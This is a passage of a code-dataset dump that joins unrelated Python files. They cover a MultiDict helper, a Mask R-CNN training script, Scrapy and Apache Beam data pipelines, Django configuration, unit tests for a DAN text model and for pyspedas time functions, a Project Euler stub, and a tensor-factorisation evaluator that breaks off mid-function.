v += len(d)
return v
def __nonzero__(self):
for d in self.dicts:
if d:
return True
return False
def items(self):
return list(self.iteritems())
def iteritems(self):
for d in self.dicts:
for item in d.iteritems():
yield item
def values(self):
return list(self.itervalues())
def itervalues(self):
for d in self.dicts:
for value in d.itervalues():
yield value
def keys(self):
return list(self.iterkeys())
def __iter__(self):
for d in self.dicts:
for key in d:
yield key
iterkeys = __iter__
class NoVars(object):
"""
Represents no variables; used when no variables
are applicable.
This is read-only
"""
def __init__(self, reason=None):
self.reason = reason or 'N/A'
def __getitem__(self, key):
raise KeyError("No key %r: %s" % (key, self.reason))
def __setitem__(self, *args, **kw):
raise KeyError("Cannot add variables: %s" % self.reason)
add = __setitem__
setdefault = __setitem__
update = __setitem__
def __delitem__(self, *args, **kw):
raise KeyError("No keys to delete: %s" % self.reason)
clear = __delitem__
pop = __delitem__
popitem = __delitem__
def get(self, key, default=None):
return default
def getall(self, key):
return []
def getone(self, key):
return self[key]
def mixed(self):
return {}
dict_of_lists = mixed
def __contains__(self, key):
return False
has_key = __contains__
def copy(self):
return self
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__,
self.reason)
def __len__(self):
return 0
def __cmp__(self, other):
return cmp({}, other)
def keys(self):
return []
def iterkeys(self):
return iter([])
__iter__ = iterkeys
items = keys
iteritems = iterkeys
values = keys
itervalues = iterkeys
__test__ = {
'general': """
>>> d = MultiDict(a=1, b=2)
>>> d['a']
1
>>> d.getall('c')
[]
>>> d.add('a', 2)
>>> d['a']
2
>>> d.getall('a')
[1, 2]
>>> d['b'] = 4
>>> d.getall('b')
[4]
>>> d.keys()
['a', 'a', 'b']
>>> d.items()
[('a', 1), ('a', 2), ('b', 4)]
>>> d.mixed()
{'a': [1, 2], 'b': 4}
>>> MultiDict([('a', 'b')], c=2)
MultiDict([('a', 'b'), ('c', 2)])
"""}
if __name__ == '__main__':
import doctest
doctest.testmod()
| StarcoderdataPython |
4802310 | <reponame>amazon-research/network-deconvolution-pp
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
r"""
Basic training script for PyTorch
"""
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (do not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
import logging
import functools
import distutils.util
from collections import OrderedDict
import datetime
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.solver import make_lr_scheduler
from maskrcnn_benchmark.solver import make_optimizer
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.engine.trainer import do_train
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank, is_main_process
from maskrcnn_benchmark.utils.imports import import_file
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
from maskrcnn_benchmark.engine.tester import test
from maskrcnn_benchmark.utils.logger import format_step
#from dllogger import Logger, StdOutBackend, JSONStreamBackend, Verbosity
#import dllogger as DLLogger
import dllogger
from torch.utils.tensorboard import SummaryWriter
# See if we can use apex.DistributedDataParallel instead of the torch default,
# and enable mixed-precision via apex.amp
try:
from apex import amp
use_amp = True
except ImportError:
print('Use APEX for multi-precision via apex.amp')
use_amp = False
try:
from apex.parallel import DistributedDataParallel as DDP
use_apex_ddp = True
except ImportError:
print('Use APEX for better performance')
use_apex_ddp = False
def test_and_exchange_map(tester, model, distributed, args):
results = tester(model=model, distributed=distributed, args=args)
# main process only
if is_main_process():
        # Note: one indirection due to the possibility of multiple test datasets; we only care about the first
# tester returns (parsed results, raw results). In our case, don't care about the latter
map_results, raw_results = results[0]
bbox_map = map_results.results["bbox"]['AP']
if cfg.MODEL.MASK_ON:
segm_map = map_results.results["segm"]['AP']
else:
segm_map = 0.
else:
bbox_map = 0.
segm_map = 0.
if distributed:
map_tensor = torch.tensor([bbox_map, segm_map], dtype=torch.float32, device=torch.device("cuda"))
torch.distributed.broadcast(map_tensor, 0)
bbox_map = map_tensor[0].item()
segm_map = map_tensor[1].item()
return bbox_map, segm_map
def mlperf_test_early_exit(iteration, iters_per_epoch, tester, model, distributed, min_bbox_map, min_segm_map,args):
if iteration > 0 and iteration % iters_per_epoch == 0:
epoch = iteration // iters_per_epoch
dllogger.log(step="PARAMETER", data={"eval_start": True})
bbox_map, segm_map = test_and_exchange_map(tester, model, distributed, args)
# necessary for correctness, this is for resuming the training
model.train()
dllogger.log(step=(iteration, epoch, ), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
if is_main_process():
args.writer.add_scalar('BBOX_mAP', bbox_map, epoch)
args.writer.add_scalar('MASK_mAP', segm_map, epoch)
# terminating condition
if bbox_map >= min_bbox_map and segm_map >= min_segm_map:
dllogger.log(step="PARAMETER", data={"target_accuracy_reached": True})
            return False  # originally True (early exit); keep training instead
return False
def train(cfg, local_rank, distributed, fp16, dllogger,args):
model = build_detection_model(cfg)
device = torch.device(cfg.MODEL.DEVICE)
model.to(device)
optimizer = make_optimizer(cfg, model)
scheduler = make_lr_scheduler(cfg, optimizer)
if use_amp:
# Initialize mixed-precision training
if fp16:
use_mixed_precision = True
else:
use_mixed_precision = cfg.DTYPE == "float16"
amp_opt_level = 'O1' if use_mixed_precision else 'O0'
model, optimizer = amp.initialize(model, optimizer, opt_level=amp_opt_level)
if distributed:
if use_apex_ddp:
model = DDP(model, delay_allreduce=True)
else:
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[local_rank], output_device=local_rank,
# this should be removed if we update BatchNorm stats
broadcast_buffers=False,
)
if is_main_process():
print(model)
arguments = {}
arguments["iteration"] = 0
output_dir = cfg.OUTPUT_DIR
save_to_disk = get_rank() == 0
checkpointer = DetectronCheckpointer(
cfg, model, optimizer, scheduler, output_dir, save_to_disk
)
extra_checkpoint_data = checkpointer.load(cfg.MODEL.WEIGHT)
arguments.update(extra_checkpoint_data)
data_loader, iters_per_epoch = make_data_loader(
cfg,
is_train=True,
is_distributed=distributed,
start_iter=arguments["iteration"],
)
checkpoint_period = cfg.SOLVER.CHECKPOINT_PERIOD
args.iters_per_epoch=iters_per_epoch
# set the callback function to evaluate and potentially
# early exit each epoch
if cfg.PER_EPOCH_EVAL:
per_iter_callback_fn = functools.partial(
mlperf_test_early_exit,
iters_per_epoch=iters_per_epoch,
tester=functools.partial(test, cfg=cfg, dllogger=dllogger,args=args),
model=model,
distributed=distributed,
min_bbox_map=cfg.MIN_BBOX_MAP,
min_segm_map=cfg.MIN_MASK_MAP,
args=args)
else:
per_iter_callback_fn = None
do_train(
model,
data_loader,
optimizer,
scheduler,
checkpointer,
device,
checkpoint_period,
arguments,
use_amp,
cfg,
dllogger,
args,
per_iter_end_callback_fn=per_iter_callback_fn,
)
return model, iters_per_epoch
def test_model(cfg, model, distributed, iters_per_epoch, dllogger,args):
if distributed:
model = model.module
torch.cuda.empty_cache() # TODO check if it helps
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
output_folders = [None] * len(cfg.DATASETS.TEST)
dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
results = []
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
result = inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
dllogger=dllogger,
args=args
)
synchronize()
results.append(result)
if is_main_process():
map_results, raw_results = results[0]
bbox_map = map_results.results["bbox"]['AP']
if cfg.MODEL.MASK_ON:
segm_map = map_results.results["segm"]['AP']
else:
segm_map=0.0
dllogger.log(step=(cfg.SOLVER.MAX_ITER, cfg.SOLVER.MAX_ITER / iters_per_epoch,), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
dllogger.log(step=tuple(), data={"BBOX_mAP": bbox_map, "MASK_mAP": segm_map})
args.writer.add_scalar('BBOX_mAP', bbox_map, cfg.SOLVER.MAX_ITER / iters_per_epoch+1)
args.writer.add_scalar('MASK_mAP', segm_map, cfg.SOLVER.MAX_ITER / iters_per_epoch+1)
def save_path_formatter(args,cfg):
args.dataset=cfg.DATASETS.TRAIN[0]
args.lr=cfg.SOLVER.BASE_LR
args.batch_size=cfg.SOLVER.IMS_PER_BATCH
args.max_iter=cfg.SOLVER.MAX_ITER
args.backbone=cfg.MODEL.BACKBONE.CONV_BODY
args.use_nd=cfg.MODEL.ROI_BOX_HEAD.USE_DECONV
args.sync=cfg.MODEL.DECONV.SYNC
if cfg.MODEL.DECONV.RPN_NORM_TYPE!='none':
args.norm_type=cfg.MODEL.DECONV.RPN_NORM_TYPE
else:
args.norm_type=cfg.MODEL.DECONV.BOX_NORM_TYPE
args.sampling_stride=cfg.MODEL.DECONV.STRIDE
args.gn_box=cfg.MODEL.ROI_BOX_HEAD.USE_GN
args.gw_box=cfg.MODEL.ROI_BOX_HEAD.USE_GW
args.train_size=cfg.INPUT.MIN_SIZE_TRAIN
args.wd=cfg.SOLVER.WEIGHT_DECAY
args.accum_steps=cfg.SOLVER.ACCUMULATE_STEPS
args.pretrained=False
args.layerwise_norm=cfg.MODEL.DECONV.LAYERWISE_NORM
if cfg.MODEL.WEIGHT:
args.pretrained=True
args.block=cfg.MODEL.DECONV.BLOCK
args.block_fc=cfg.MODEL.DECONV.BLOCK_FC
args_dict = vars(args)
data_folder_name = args_dict['dataset']
folder_string = [data_folder_name]
key_map = OrderedDict()
key_map['backbone'] = ''
key_map['max_iter'] = 'max_iter'
key_map['lr']=''
key_map['batch_size']='bs'
key_map['use_nd']='nd'
key_map['gn_box']='gn'
key_map['gw_box']='gw'
key_map['block']='blk'
key_map['block_fc']='blk_fc'
key_map['sync']='sync'
key_map['sampling_stride']='stride'
key_map['norm_type']=''
key_map['train_size']='size'
key_map['pretrained']='pretrain'
key_map['wd']='wd'
key_map['layerwise_norm']='lwn'
#key_map['debug']='debug'
if cfg.SOLVER.ACCUMULATE_GRAD:
key_map['accum_steps']='cum'
for key, key2 in key_map.items():
value = args_dict[key]
        if key2 != '':
folder_string.append('{}:{}'.format(key2, value))
else:
folder_string.append('{}'.format(value))
save_path = ','.join(folder_string)
timestamp = datetime.datetime.now().strftime("%m-%d-%H:%M")
return os.path.join('checkpoints',save_path,timestamp)
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Training")
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument("--local_rank", type=int, default=os.getenv('LOCAL_RANK', 0))
parser.add_argument("--max_steps", type=int, default=0, help="Override number of training steps in the config")
parser.add_argument("--skip-test", dest="skip_test", help="Do not test the final model",
action="store_true",)
parser.add_argument("--fp16", help="Mixed precision training", action="store_true")
parser.add_argument("--amp", help="Mixed precision training", action="store_true")
parser.add_argument('--skip_checkpoint', default=False, action='store_true', help="Whether to save checkpoints")
parser.add_argument("--json-summary", help="Out file for DLLogger", default="dllogger.out",
type=str,
)
parser.add_argument("--debug", type=distutils.util.strtobool, default=False, help="debug")
parser.add_argument("--eval-loss", action="store_true", default=False, help="evaluate loss(very buggy)")
parser.add_argument("--print-freq", type=int, default=100, help="print freq for tensorboard")
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
args.fp16 = args.fp16 or args.amp
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
args.distributed = num_gpus > 1
if args.distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
synchronize()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
if args.debug:
cfg.DEBUG=args.debug
# Redundant option - Override config parameter with command line input
if args.max_steps > 0:
cfg.SOLVER.MAX_ITER = args.max_steps
if args.skip_checkpoint:
cfg.SAVE_CHECKPOINT = False
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir:
mkdir(output_dir)
args.log_dir=save_path_formatter(args,cfg)
logger = setup_logger("maskrcnn_benchmark", output_dir, get_rank())
if is_main_process():
dllogger.init(backends=[dllogger.JSONStreamBackend(verbosity=dllogger.Verbosity.VERBOSE,
filename=args.json_summary),
dllogger.StdOutBackend(verbosity=dllogger.Verbosity.VERBOSE, step_format=format_step)])
else:
dllogger.init(backends=[])
dllogger.log(step="PARAMETER", data={"gpu_count":num_gpus})
# dllogger.log(step="PARAMETER", data={"environment_info": collect_env_info()})
dllogger.log(step="PARAMETER", data={"config_file": args.config_file})
with open(args.config_file, "r") as cf:
config_str = "\n" + cf.read()
dllogger.log(step="PARAMETER", data={"config":cfg})
if is_main_process():
args.writer = SummaryWriter(args.log_dir,flush_secs=30)
if args.fp16:
fp16 = True
else:
fp16 = False
model, iters_per_epoch = train(cfg, args.local_rank, args.distributed, fp16, dllogger, args)
if not args.skip_test:
#if not cfg.PER_EPOCH_EVAL:
test_model(cfg, model, args.distributed, iters_per_epoch, dllogger, args)
if __name__ == "__main__":
main()
dllogger.log(step=tuple(), data={})
dllogger.flush()
| StarcoderdataPython |
1687992 | from scrapy import signals
from scrapy.exporters import CsvItemExporter, XmlItemExporter
class DownloadPipeline(object):
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
self.file = open('output.xlsx', 'w+b')
self.exporter = CsvItemExporter(self.file)
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
self.file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
        return item | StarcoderdataPython |
1687075 | #!/usr/bin/python3
from sanitise import *
def generate_orchestration(namespace, prefix, orchestration):
sane_prefix = sanitise_for_include_guard(prefix)
header_filename = '{}orchestration.hpp'.format(prefix)
with open(header_filename, 'w') as file:
header = \
'''#ifndef crocofix_libcrocofixdictionary_{}orchestration_hpp
#define crocofix_libcrocofixdictionary_{}orchestration_hpp
#include <libcrocofixdictionary/orchestration.hpp>
#include "{}messages.hpp"
#include "{}fields.hpp"
namespace {}
{{
'''.format(sane_prefix, sane_prefix, sane_prefix, sane_prefix, namespace)
file.write(header)
body = \
'''
class orchestration : public crocofix::dictionary::orchestration
{{
public:
orchestration()
: crocofix::dictionary::orchestration({}::messages(), {}::fields())
{{
}}
}};
'''.format(namespace, namespace)
file.write(body)
trailer = \
'''}
#endif
'''
file.write(trailer)
| StarcoderdataPython |
173147 | from __future__ import absolute_import
import logging
from io import StringIO
import argparse
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions, StandardOptions, GoogleCloudOptions, SetupOptions
from apache_beam.io.gcp.internal.clients import bigquery
from dotenv import load_dotenv
load_dotenv()
def run(argv=None):
import re
import datetime
def string_to_dict(col_names, string_input):
"""
Transform each row of PCollection, which is one string from reading,
to dictionary which can be read by BigQuery
"""
values = re.split(',', re.sub(
'\r\n', '', re.sub(u'"', '', string_input)))
row = dict(zip(col_names, values))
return row
def milli_to_datetime(input):
output = input.copy()
dt = datetime.datetime.fromtimestamp(int(input['timestamp'])//1000)
output['timestamp'] = dt.strftime('%Y-%m-%d %H:%M:%S')
return output
def get_names_from_schema(input):
return map(lambda field: field['name'], input['fields'])
schema = {
'fields': [
{'name': 'timestamp', 'type': 'DATETIME', 'mode': 'REQUIRED'},
{'name': 'value', 'type': 'NUMERIC', 'mode': 'NULLABLE'}
]
}
# Command Line Options
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
help='Cloud Storage path to input file e.g. gs://cubems-data-pipeline.appspot.com/test.csv'
)
parser.add_argument(
'--output',
help='Output BigQuery table to write to e.g. set.table1'
)
args = parser.parse_args()
# Direct Runner options
options = PipelineOptions()
gcp_options = options.view_as(GoogleCloudOptions)
gcp_options.project = 'cubems-data-pipeline'
gcp_options.region = 'asia-east1'
gcp_options.job_name = 'testjob'
gcp_options.temp_location = 'gs://cubems-data-pipeline.appspot.com/temp_location'
options.view_as(StandardOptions).runner = 'DataflowRunner'
p = beam.Pipeline(options=options)
(p
| 'Read CSV' >> beam.io.ReadFromText(args.input, skip_header_lines=1)
| 'Transform string to dictionary' >> beam.Map(lambda s: string_to_dict(get_names_from_schema(schema), s))
| 'Transform string to valid timestamp' >> beam.Map(lambda s: milli_to_datetime(s))
| 'Write to BigQuery' >> beam.io.WriteToBigQuery(
args.output,
schema=schema,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)
)
p.run()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| StarcoderdataPython |
166260 | <reponame>starsep/NewsBlur<gh_stars>1000+
from apps.reader.models import UserSubscription, UserSubscriptionFolders, Feature
from django.contrib import admin
admin.site.register(UserSubscription)
admin.site.register(UserSubscriptionFolders)
admin.site.register(Feature) | StarcoderdataPython |
90957 | from django.conf import settings
# Map of mode -> processor config
# {
# 'js': {
# 'processor': 'damn.processors.ScriptProcessor',
# 'aliases': {},
# },
# }
PROCESSORS = getattr(settings, "DAMN_PROCESSORS", {})
# File extension -> mode name
MODE_MAP = getattr(settings, "DAMN_MODE_MAP", {})
MODE_ORDER = getattr(settings, "DAMN_MODE_ORDER", ["css", "js",])
| StarcoderdataPython |
1700448 | import unittest
from dan import DanModel, QuestionDataset
import numpy as np
import torch
import torch.nn as nn
text1 = {'text':torch.LongTensor([[2, 3]]).view(1, 2), 'len': torch.FloatTensor([2])}
text2 = {'text':torch.LongTensor([[1, 3, 4, 2, 1, 0]]).view(1, 6), 'len': torch.FloatTensor([5])}
text3 = {'text':torch.LongTensor([[2, 3, 1], [3, 4, 0]]), 'len': torch.FloatTensor([3, 2])}
text4 = {'text':torch.LongTensor([[1, 0, 0, 0, 0], [2, 4, 4, 3, 1], [3, 4, 1, 0, 0]]), 'len': torch.FloatTensor([1, 5, 3])}
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.toy_dan_model = DanModel(2, 5, emb_dim=2, n_hidden_units=2)
self.wide_dan_model = DanModel(1, 1, emb_dim=4, n_hidden_units=1)
self.toy_dan_model.eval()
weight_matrix = torch.tensor([[0, 0], [0.1, 0.9], [0.3, 0.4], [0.5, 0.5], [0.6, 0.2]])
self.toy_dan_model.embeddings.weight.data.copy_(weight_matrix)
l1_weight = torch.tensor([[0.2, 0.9], [-0.1, 0.7]])
self.toy_dan_model.linear1.weight.data.copy_(l1_weight)
l2_weight = torch.tensor([[-0.2, 0.4], [-1, 1.3]])
self.toy_dan_model.linear2.weight.data.copy_(l2_weight)
nn.init.ones_(self.toy_dan_model.linear1.bias.data)
nn.init.zeros_(self.toy_dan_model.linear2.bias.data)
def test_forward_logits(self):
logits = self.toy_dan_model(text1['text'], text1['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2130, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.1724999, places=2)
logits = self.toy_dan_model(text2['text'], text2['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2324001, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2002001, places=2)
def test_average(self):
d1 = [[1, 1, 1, 1]] * 3
d2 = [[2, 2, 2, 2]] * 2
d2.append([0, 0, 0, 0])
docs = torch.tensor([d1, d2])
lengths = torch.tensor([3, 2])
average = self.wide_dan_model.average(docs, lengths)
for ii in range(4):
self.assertAlmostEqual(average[0][ii], 1.0)
self.assertAlmostEqual(average[1][ii], 2.0)
def test_minibatch_logits(self):
logits = self.toy_dan_model(text3['text'], text3['len'])
print(logits)
self.assertAlmostEqual(logits[0][0].item(), 0.2360, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2070, places=2)
self.assertAlmostEqual(logits[1][0].item(), 0.1910, places=2)
self.assertAlmostEqual(logits[1][1].item(), 0.1219999, places=2)
logits = self.toy_dan_model(text4['text'], text4['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2820, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2760, places=2)
self.assertAlmostEqual(logits[1][0].item(), 0.2104, places=2)
self.assertAlmostEqual(logits[1][1].item(), 0.1658, places=2)
self.assertAlmostEqual(logits[2][0].item(), 0.2213333, places=2)
self.assertAlmostEqual(logits[2][1].item(), 0.1733332, places=2)
def test_vectorize(self):
word2ind = {'text': 0, '<unk>': 1, 'test': 2, 'is': 3, 'fun': 4, 'check': 5, 'vector': 6, 'correct': 7}
lb = 1
text1 = ['text', 'test', 'is', 'fun']
ex1 = text1
vec_text = QuestionDataset.vectorize(ex1, word2ind)
self.assertEqual(vec_text[0], 0)
self.assertEqual(vec_text[1], 2)
self.assertEqual(vec_text[2], 3)
self.assertEqual(vec_text[3], 4)
text2 = ['check', 'vector', 'correct', 'hahaha']
ex2 = text2
vec_text = QuestionDataset.vectorize(ex2, word2ind)
self.assertEqual(vec_text[0], 5)
self.assertEqual(vec_text[1], 6)
self.assertEqual(vec_text[2], 7)
self.assertEqual(vec_text[3], 1)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1614806 | from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('index',views.index,name='index'),
path('about',views.about,name='about'),
path('buses',views.buses,name='buses'),
path('Route',views.Route,name='Route')
]
| StarcoderdataPython |
4817819 | <gh_stars>10-100
import unittest
from datetime import datetime, timezone
from pyspedas.utilities.time_string import time_string, time_datetime, time_string_one
from pyspedas.utilities.time_double import time_float_one, time_float, time_double
class TimeTestCases(unittest.TestCase):
def test_time_datetime(self):
"""Test time_datetime function."""
self.assertTrue(time_datetime(1450137600.0000000) == datetime(2015, 12, 15, 0, 0, tzinfo=timezone.utc))
self.assertTrue([time_datetime(1450137600.0000000), time_datetime(1444953600.0000000)]
== [datetime(2015, 12, 15, 0, 0, tzinfo=timezone.utc), datetime(2015, 10, 16, 0, 0, tzinfo=timezone.utc)])
def test_time_string(self):
"""Test time_string function."""
self.assertTrue(time_string(fmt='%Y-%m-%d') == datetime.now().strftime('%Y-%m-%d'))
self.assertTrue(time_string(1450181243.767, fmt='%Y-%m-%d') == '2015-12-15')
self.assertTrue(time_string(1450181243.767, fmt='%Y-%m-%d/%H:%M:%S') == '2015-12-15/12:07:23')
self.assertTrue(time_string(1450181243.767) == '2015-12-15 12:07:23.767000')
self.assertTrue(time_string([1450181243.767, 1450181263.767]) == ['2015-12-15 12:07:23.767000', '2015-12-15 12:07:43.767000'])
def test_time_double(self):
"""Test time_double function."""
self.assertTrue(time_string(time_double(), fmt='%Y-%m-%d') == datetime.now().strftime('%Y-%m-%d'))
self.assertTrue(time_double('2015-12-15/12:00') == 1450180800.0000000)
self.assertTrue(time_double('2015-12-15/12') == 1450180800.0000000)
#self.assertTrue(time_double('2015-12-15/6') == 1450159200.0000000) #this one doesn't work
self.assertTrue(time_double('2015-12-15/6:00') == 1450159200.0000000)
self.assertTrue(time_double('2015-12-15/06:00') == 1450159200.0000000)
self.assertTrue(time_double('2015-12-15') == 1450137600.0000000)
self.assertTrue(time_double('2015 12 15') == 1450137600.0000000)
self.assertTrue(time_double('2015-12') == 1448928000.0000000)
self.assertTrue(time_double('2015') == 1420070400.0000000)
self.assertTrue(time_double('2015-12-15 12:07:23.767000') == 1450181243.767)
self.assertTrue(time_double(['2015-12-15 12:07:23.767000', '2015-12-15 12:07:43.767000']) == [1450181243.767, 1450181263.767])
if __name__ == '__main__':
unittest.main() | StarcoderdataPython |
3232718 | """
"""
__author__ = '<NAME> (DRL)'
# region the regular Type-Hints stuff
try:
# support type hints in Python 3:
# noinspection PyUnresolvedReferences
import typing as _t
except ImportError:
pass
# endregion
| StarcoderdataPython |
114447 | <filename>code/lychrel_numbers/sol_55.py
# -*- coding: utf-8 -*-
'''
File name: code\lychrel_numbers\sol_55.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #55 :: Lychrel numbers
#
# For more information see:
# https://projecteuler.net/problem=55
# Problem Statement
'''
If we take 47, reverse and add, 47 + 74 = 121, which is palindromic.
Not all numbers produce palindromes so quickly. For example,
349 + 943 = 1292,
1292 + 2921 = 4213,
4213 + 3124 = 7337
That is, 349 took three iterations to arrive at a palindrome.
Although no one has proved it yet, it is thought that some numbers, like 196, never produce a palindrome. A number that never forms a palindrome through the reverse and add process is called a Lychrel number. Due to the theoretical nature of these numbers, and for the purpose of this problem, we shall assume that a number is Lychrel until proven otherwise.
In addition you are given that for every number below ten-thousand, it will either (i) become a palindrome in less than fifty iterations, or, (ii) no one, with all the computing power that exists, has managed so far to map it to a palindrome. In fact, 10677 is the first number to be shown to require over fifty iterations before producing a palindrome: 4668731596684224866951378664 (53 iterations, 28-digits).
Surprisingly, there are palindromic numbers that are themselves Lychrel numbers; the first example is 4994.
How many Lychrel numbers are there below ten-thousand?
NOTE: Wording was modified slightly on 24 April 2007 to emphasise the theoretical nature of Lychrel numbers.
'''
# Solution
# Solution Approach
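# A minimal brute-force sketch of one possible approach: apply the
# reverse-and-add step up to fifty times and count the numbers below
# ten-thousand that never reach a palindrome within that limit.
def is_palindrome(n):
    s = str(n)
    return s == s[::-1]
def is_lychrel(n, max_iterations=50):
    for _ in range(max_iterations):
        n += int(str(n)[::-1])
        if is_palindrome(n):
            return False
    return True
if __name__ == '__main__':
    print(sum(1 for n in range(1, 10000) if is_lychrel(n)))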
'''
'''
| StarcoderdataPython |
16943 | #!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose): #put this in class
if len(words)==1: #does not capture UniProt peptide case
if verbose:
print 'No chain found: {0}. Structure is discarded'.format(words)
length = ''
elif '>' in words[i+1]:
length = ''
elif '?' in words[i+1]:
length = ''
elif '?' in words[i] or '<' in words[i]:
if verbose:
print 'No starting residue for chain: {0}'.format(words)
length = int(words[i+1])
else:
length = int(words[i+1]) - int(words[i]) + 1
return length
class UniProtLength():
def __init__(self, verbose, d_ref):
self.verbose = verbose
self.d_ref = d_ref
uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
if organism=='new_protherm':
print len(d_ref)
self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
else:
self.labels, self.raw_data = uniprotapi.organism_info()
self.d_output = {}
def run(self):
for line in self.raw_data:
words = line.split()
uniprot = words[self.labels.index('Entry')]
if uniprot in self.d_ref:
chain_length_i = self.labels.index('Chain')+1
chain_length = parse_chain_length(words, chain_length_i, self.verbose)
if chain_length:
self.d_output[uniprot] = chain_length
return self.d_output
if __name__ == "__main__":
args = help_message(help_msg, bool_add_verbose = True)
d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
uniprot_length = UniProtLength(args.verbose, d_ref)
d_output = uniprot_length.run()
if organism!='protherm':
d_output = {d_ref[uniprot]: res for uniprot, res in d_output.iteritems()}
xlabel = 'oln'
else: #not supported for ProTherm
xlabel = 'uniprot'
writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| StarcoderdataPython |
1708651 | <reponame>ENCODERS09/AMF
########################################################
# evaluator.py
# Author: <NAME> <<EMAIL>>
# Created: 2014/2/6
# Last updated: 2016/4/30
########################################################
import numpy as np
import time
from utils import logger
import evallib
import AMF
from scipy import stats, special
import multiprocessing
#======================================================#
# Function to evalute the approach at all settings
#======================================================#
def execute(tensor, para):
# loop over each density and each round
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for den in para['density']:
for roundId in xrange(para['rounds']):
pool.apply_async(executeOneSetting, (tensor, den, roundId, para))
pool.close()
pool.join()
else: # run on single processes
for den in para['density']:
for roundId in xrange(para['rounds']):
executeOneSetting(tensor, den, roundId, para)
# summarize the dumped results
evallib.summarizeResult(para, tensor.shape[2])
#======================================================#
# Function to run the prediction approach at one setting
#======================================================#
def executeOneSetting(tensor, density, roundId, para):
logger.info('density=%.2f, %2d-round starts.'%(density, roundId + 1))
(numUser, numService, numTime) = tensor.shape
dim = para['dimension']
# initialization
U = np.random.rand(numUser, dim)
S = np.random.rand(numService, dim)
p = np.zeros(numUser)
q = np.zeros(numService)
# run for each time slice
for sliceId in xrange(numTime):
# boxcox data transformation
matrix = tensor[:, :, sliceId]
dataVector = matrix[:]
(transfVector, alpha) = stats.boxcox(dataVector[dataVector > 0])
maxV = np.max(transfVector)
minV = np.min(transfVector)
transfMatrix = matrix.copy()
transfMatrix[transfMatrix != -1] = stats.boxcox(transfMatrix[transfMatrix != -1], alpha)
transfMatrix[transfMatrix != -1] = (transfMatrix[transfMatrix != -1] - minV) / (maxV - minV)
# remove data entries to generate trainMatrix and testMatrix
seedID = roundId + sliceId * 100
(trainMatrix, testMatrix) = evallib.removeEntries(matrix, density, seedID)
trainMatrix = np.where(trainMatrix > 0, transfMatrix, 0)
(testVecX, testVecY) = np.where(testMatrix)
testVec = matrix[testVecX, testVecY]
# invocation to the prediction function
startTime = time.clock()
